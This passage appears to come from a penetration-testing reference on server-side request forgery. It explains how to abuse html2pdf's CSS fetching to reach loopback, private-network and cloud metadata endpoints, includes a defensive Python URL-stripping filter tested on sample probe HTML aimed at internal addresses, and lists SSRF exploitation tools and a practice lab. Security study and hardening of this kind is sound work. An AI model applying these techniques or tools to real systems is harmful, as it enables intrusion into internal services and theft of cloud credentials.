  • html2pdf mirrors TCPDF's behaviour for <img> and adds CSS fetching inside Css::extractStyle(), which blindly calls file_get_contents($href) after minimal scheme checks. Abuse it to reach loopback services, RFC1918 ranges or cloud metadata endpoints.
  • Combine this SSRF primitive with the HTML-to-PDF path traversal tricks to leak internal HTTP responses and local files rendered inside the PDF.

Hardeners should strip external URLs before rendering or put the renderer in a network sandbox; until then, treat PDF generators as blind SSRF proxies.
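Added example (not from the page or from TCPDF/html2pdf): a pre-render pass that removes every fetchable URL attribute not on an explicit origin allowlist, run on the probe HTML above plus two harmless references. Inline style url() values are not handled here; the allowlisted origin is constructed.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

URL_ATTRS = {"src", "href", "data", "poster", "background"}
# Origins the renderer is allowed to fetch from (constructed allowlist)
ALLOWED_ORIGINS = {("https", "static.example.com")}

def fetch_allowed(value):
    parts = urlsplit(value.strip())
    if parts.scheme.lower() == "data":
        return True                     # inline content, nothing is fetched
    if not parts.scheme or not parts.netloc:
        return False                    # relative and file refs resolve on the server
    return (parts.scheme.lower(), parts.hostname) in ALLOWED_ORIGINS

class FetchStripper(HTMLParser):
    """Re-emits the HTML with every fetchable attribute dropped unless allowed."""
    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out, self.dropped = [], []

    def _attrs(self, attrs):
        kept = []
        for name, value in attrs:
            if name in URL_ATTRS and value is not None and not fetch_allowed(value):
                self.dropped.append(value)
                continue
            kept.append(name if value is None else f'{name}="{html.escape(value, quote=True)}"')
        return "".join(" " + a for a in kept)

    def handle_starttag(self, tag, attrs):
        self.out.append(f"<{tag}{self._attrs(attrs)}>")
    def handle_startendtag(self, tag, attrs):
        self.out.append(f"<{tag}{self._attrs(attrs)} />")
    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")
    def handle_data(self, data):
        self.out.append(data)
    def handle_entityref(self, name):
        self.out.append(f"&{name};")
    def handle_charref(self, name):
        self.out.append(f"&#{name};")
    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")

def strip_fetchable_urls(html_src):
    """Return (cleaned_html, dropped_urls)."""
    p = FetchStripper()
    p.feed(html_src)
    p.close()
    return "".join(p.out), p.dropped

# constructed sample: the probes from the section above plus two harmless references
SAMPLE_HTML = """<html>
<body>
<img width="1" height="1" src="http://127.0.0.1:8080/healthz">
<link rel="stylesheet" type="text/css" href="http://10.0.0.5/admin" />
<img src="https://static.example.com/logo.png" alt="ok">
<img src="data:image/gif;base64,R0lGODlhAQABAAAAACw=">
</body>
</html>"""

if __name__ == "__main__":
    cleaned, dropped = strip_fetchable_urls(SAMPLE_HTML)
    print(cleaned)
    print("dropped:", dropped)
```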

SSRF exploitation in the cloud

If you find a SSRF vulnerability in a machine running inside a cloud environment you might be able to obtain interesting information about the cloud environment and even credentials:

Cloud SSRF

SSRF Vulnerable Platforms

Several well-known platforms contain or have contained SSRF vulnerabilities; check them at:

SSRF Vulnerable Platforms

Tools

SSRFMap

Tool to detect and exploit SSRF vulnerabilities

Gopherus

This tool generates Gopher payloads for:

  • MySQL
  • PostgreSQL
  • FastCGI
  • Redis
  • Zabbix
  • Memcache

remote-method-guesser

remote-method-guesser is a Java RMI vulnerability scanner that supports attack operations for most common Java RMI vulnerabilities. Most of the available operations support the --ssrf option to generate an SSRF payload for the requested operation. Together with the --gopher option, ready-to-use gopher payloads can be generated directly.

SSRF Proxy

SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).

To practice

GitHub - incredibleindishell/SSRF_Vulnerable_Lab: This Lab contain the sample codes which are vulnerable to Server-Side Request Forgery attack · GitHub
